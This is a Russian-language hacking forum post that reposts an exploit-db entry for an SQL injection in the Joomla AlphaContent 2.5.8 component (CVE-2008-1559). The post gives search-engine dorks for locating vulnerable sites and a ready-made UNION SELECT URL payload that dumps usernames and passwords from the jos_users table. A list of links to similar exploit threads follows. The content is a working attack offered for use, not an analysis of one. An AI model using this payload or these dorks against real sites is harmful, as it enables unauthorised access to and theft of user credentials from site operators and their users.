Exploit Joomla! Component Alphacontent 2.5.8 - 'id' SQL Injection

Exploiter

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
5310
Проверка EDB
  1. Пройдено
Автор
CO2
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
cve-2008-1559
Дата публикации
2008-03-25
Код: 
##########################################
#
# [ Joomla Component com_alphacontent SQL Injection ]
#
##########################################
[~] Vulnerability found by: cO2 [ Algeria Security Crew ]
[~] Contact: c02[at]hotmail.de
[~] Website: http://www.dzw0rm.ch
[~] Greetings: to all hackers DZ
##########################################
[~] ScriptName : 'Joomla'
[~] ModuleName : 'AlphaContent'
[~]  Version() : '2.5.8 '
###########################################
#
# DORK 1 :  inurl: "com_alphacontent"
#
# DORK 2 : "AlphaContent 2.5.8 © 2005-2008 - visualclinic.fr"
#
###########################################
[+]Exploit :
 
index.php?option=com_alphacontent&section=6&cat=15&task=view&id=-999999/**/union/**/select/**/1,concat(username,0x3e,password),3,4,user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),user(),39/**/from/**/jos_users/*
###########################################
[+] : you can see the password in 'Title'
###########################################

side note:
  <name>alphacontent</name>
  <creationDate>25 Jul 2007</creationDate>
  <author>Bernard Gilly</author>
  <copyright>This component is released under the GNU/GPL License.</copyright>
  <authorEmail>[email protected]</authorEmail>

  <authorUrl>www.visualclinic.fr</authorUrl>
  <version>2.5.8</version>
  <description>Directory component with alphabetical indexes for Joomla's Content</description>

  <name>alphacontent</name>
  <creationDate>16 Sept 2006</creationDate>
  <author>Bernard Gilly</author>
  <copyright>This component is released under the GNU/GPL License.</copyright>
  <authorEmail>[email protected]</authorEmail>

  <authorUrl>www.visualclinic.fr</authorUrl>
  <version>2.5.4</version>
  <description>Directory component and alphabetical indexes for Mambo/Joomla's Content</description>

# milw0rm.com [2008-03-25]
 
Источник
www.exploit-db.com
Войдите или зарегистрируйтесь для ответа.

Похожие темы

Exploiter
Exploit Joomla! Component Alphacontent 2.5.8 - Blind SQL Injection
Ответы
0
Просмотры
261
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Joomla! Component Acymailing Starter 5.9.5 - CSV Macro Injection
Ответы
0
Просмотры
849
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Joomla! Component AcySMS 3.5.0 - CSV Macro Injection
Ответы
0
Просмотры
856
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Joomla! Component Fields - SQLi Remote Code Execution (Metasploit)
Ответы
0
Просмотры
933
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Joomla! Component ccNewsletter 2.x.x 'id' - SQL Injection
Ответы
0
Просмотры
911
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Joomla! Component Staff Master 1.0 RC 1 - SQL Injection
Ответы
0
Просмотры
909
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Joomla! Component Timetable Responsive Schedule For Joomla! 1.5 - 'alias' SQL Injection
Ответы
0
Просмотры
901
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Joomla! Component NeoRecruit 4.1 - SQL Injection
Ответы
0
Просмотры
904
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Joomla! Component Project Log 1.5.3 - 'search' SQL Injection
Ответы
0
Просмотры
914
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Joomla! Component Smart Shoutbox 3.0.0 - SQL Injection
Ответы
0
Просмотры
902
Эксплойты & Уязвимости
Exploiter
Exploiter
Сверху Снизу